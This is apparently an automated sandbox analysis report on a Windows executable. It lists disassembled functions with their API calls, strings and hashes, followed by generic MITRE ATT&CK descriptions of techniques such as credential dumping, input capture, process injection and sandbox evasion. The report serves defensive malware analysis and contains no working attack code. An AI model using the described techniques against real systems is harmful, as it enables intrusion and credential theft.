Instruction ID: b4cc3336d628ed3d4d64102615ca218bc3fd47faead9477d43aca9bc9b2a5f18
Opcode Fuzzy Hash: b26c0256bc388f6704f1c0c173301c959c42b8d0af987833de846fc609746c33
Instruction Fuzzy Hash: A611D032D01918ABCB70DFD8DC45BEA73B8AB46324F044021E895F7290D7B8AD0AE791

Function 00F721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F7222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F72255

Strings

<local>, xrefs: 00F7221D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 9114bdca77d19cfed1c947f6efc5f8bea1bbcd77d03c2a835489dfdc452ff962
Instruction ID: 60d5e98ad324e8df36e764905d17f2810089ee6044ca436e58bdc20196ef870a
Opcode Fuzzy Hash: 9114bdca77d19cfed1c947f6efc5f8bea1bbcd77d03c2a835489dfdc452ff962
Instruction Fuzzy Hash: 2E11C170A01225BAEB248F118C84EFABBA8FB06361F10C22BF51886001D3709954E6F2

Function 00F58E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F58E73

Strings

ComboBox, xrefs: 00F58E12
ListBox, xrefs: 00F58E3D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 694185d1ca3cdfc0251d82467310fc26482895347608387cc27337d508214397
Instruction ID: 084122e8b326da37413ccbe51db68cc2dcaf02baf5ed63b19bb8667843a430a0
Opcode Fuzzy Hash: 694185d1ca3cdfc0251d82467310fc26482895347608387cc27337d508214397
Instruction Fuzzy Hash: 9701F171A01218AFCF14FBE0CC429FE7369AF02360B100A19BD21672E1EE39980CFA50

Function 00F68D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F68DAC
__fread_nolock.LIBCMT ref: 00F68DC1

Strings

EA06, xrefs: 00F68DF3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: da185d2b61cdbfee754045d54b36ef5face98b7052f8770ef4714e1c0941aea9
Instruction ID: 3674e5b18de66fd917611e435dc40c552112d2d4f76d14ccfaa860b68999143d
Opcode Fuzzy Hash: da185d2b61cdbfee754045d54b36ef5face98b7052f8770ef4714e1c0941aea9
Instruction Fuzzy Hash: 4601F972C042287FDB18CAA8DC16EFE7BFCDB11711F00419EF552D2181E878E6049B60

Function 00F58CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00F58D6B

Strings

ComboBox, xrefs: 00F58D0A
ListBox, xrefs: 00F58D35

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6756c0e9a2a8ba0d1bfb7c798d28f9b433002aec5ee63b1a59c98f10d88022b5
Instruction ID: 7dfc0222265b760ed210c9b65325303dd9d57acbffb1a4c3e7b0657f83b7129a
Opcode Fuzzy Hash: 6756c0e9a2a8ba0d1bfb7c798d28f9b433002aec5ee63b1a59c98f10d88022b5
Instruction Fuzzy Hash: 2201B171A41208ABCF14FBA0CD52AFE73A89F15351F100019BA05B72D1DE289A0CB661

Function 00F58D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00F58DEE

Strings

ComboBox, xrefs: 00F58D8F
ListBox, xrefs: 00F58DBA

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: e34081225d63438e5ec48958090ba4cce2af3147b824749ff7755e26cde3a21b
Instruction ID: 71cd173d81ff4832516f4d1453d84c0946e1ac492faf5383c1b2ddb21403a1ae
Opcode Fuzzy Hash: e34081225d63438e5ec48958090ba4cce2af3147b824749ff7755e26cde3a21b
Instruction Fuzzy Hash: BC018F72A41209ABDB11FAA4CD42AFE77A89B11351F200115BD05B32D2DA299E1DF6B2

Function 00F64F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00F64F46
_wcscmp.LIBCMT ref: 00F64F58

Strings

#32770, xrefs: 00F64F52

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 478fb6e2feecfde065329191210008e907abeea24d79542087ce53d872e6954a
Instruction ID: 9dd1917b9f38969ef1e31dbaeaf35e7b9cb63b3ab11a5711deb76a7d5f22130e
Opcode Fuzzy Hash: 478fb6e2feecfde065329191210008e907abeea24d79542087ce53d872e6954a
Instruction Fuzzy Hash: DAE0D13260423D2BE7209B55AC46FE7F7ACDB55B70F150057FD04D3051D560AA45D7E1

Function 00F3B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00F3B314: _memset.LIBCMT ref: 00F3B321

Part of subcall function 00F20940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F3B2F0,?,?,?,00F0100A), ref: 00F20945

IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F3B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F3B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3B2FE

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: c35c51c3c23cbde87c34700ea695bf2fa71e89695c1f362947903c86a5739099
Instruction ID: 2274334b46ebe26682e2c103d1849c7eebb8d799e6ea1fe3fbca7a7ae817ba73
Opcode Fuzzy Hash: c35c51c3c23cbde87c34700ea695bf2fa71e89695c1f362947903c86a5739099
Instruction Fuzzy Hash: 70E092B02007208FD760EF28E9047827BE4AF00724F00892CE446C7341EBB4E488EBA1

Function 00F57C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F57C82

Part of subcall function 00F23358: _doexit.LIBCMT ref: 00F23362

Strings

AutoIt, xrefs: 00F57C76
Error allocating memory., xrefs: 00F57C7B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 39214188f0de70dfa9467d576ed2078d4d30d856b2edce96fce185ea26e9140e
Instruction ID: 92de1ac7cb0bc424a37dd42f86295772a577c75883c0b87c75afd1c89c36f0cf
Opcode Fuzzy Hash: 39214188f0de70dfa9467d576ed2078d4d30d856b2edce96fce185ea26e9140e
Instruction Fuzzy Hash: D5D05B323C432C36D11572A57C07FDA76484F05B53F140425FF04595D34DD9998472E5

Function 00F41935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00F41775

Part of subcall function 00F7BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F4195E,?), ref: 00F7BFFE
Part of subcall function 00F7BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F7C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F4196D

Strings

WIN_XPe, xrefs: 00F41788

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 2b15cae1243f1daf39341146dac39eeb6710a2622464d6009b4a72e1d33d1320
Instruction ID: 8fca30570b87097e7739fec06d6046ba9ba3b5352ca5433f5c0bd07c8cb7d9ef
Opcode Fuzzy Hash: 2b15cae1243f1daf39341146dac39eeb6710a2622464d6009b4a72e1d33d1320
Instruction Fuzzy Hash: BDF0C97180410DDFDB15DB91CA88BECBBF8BB08305F640095E516A2090D7755F88FF65

Function 00F85998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F859AE
PostMessageW.USER32(00000000), ref: 00F859B5

Part of subcall function 00F65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

Strings

Shell_TrayWnd, xrefs: 00F859A7

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 74094b084d60d7e83c711d47a34b0d5ff704315d4b8dcc312e2fc97774b29c15
Instruction ID: 98de7ec8839aa33a3252a6413624475c3b64922efb49c9828afa13f50ddc632d
Opcode Fuzzy Hash: 74094b084d60d7e83c711d47a34b0d5ff704315d4b8dcc312e2fc97774b29c15
Instruction Fuzzy Hash: 7BD0C9313803157AE664BB709C0FFE67A14AB44B50F040825B246AA1D0D9E4A804DB54

Function 00F85964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F8596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F85981

Part of subcall function 00F65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

Strings

Shell_TrayWnd, xrefs: 00F85967

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0622d73958480cd4739fae2a1cb21b1d67c6748e171340672d9c5af276b1d09d
Instruction ID: 7497ebeee904b9dbf32ddee99b37047397451785935911140e93307e25ebab25
Opcode Fuzzy Hash: 0622d73958480cd4739fae2a1cb21b1d67c6748e171340672d9c5af276b1d09d
Instruction Fuzzy Hash: A0D0C931384315BAE664BB709C1FFE67A14AB40B50F040825B24AAA1D0D9E4A804DB54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EIvidclKOb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

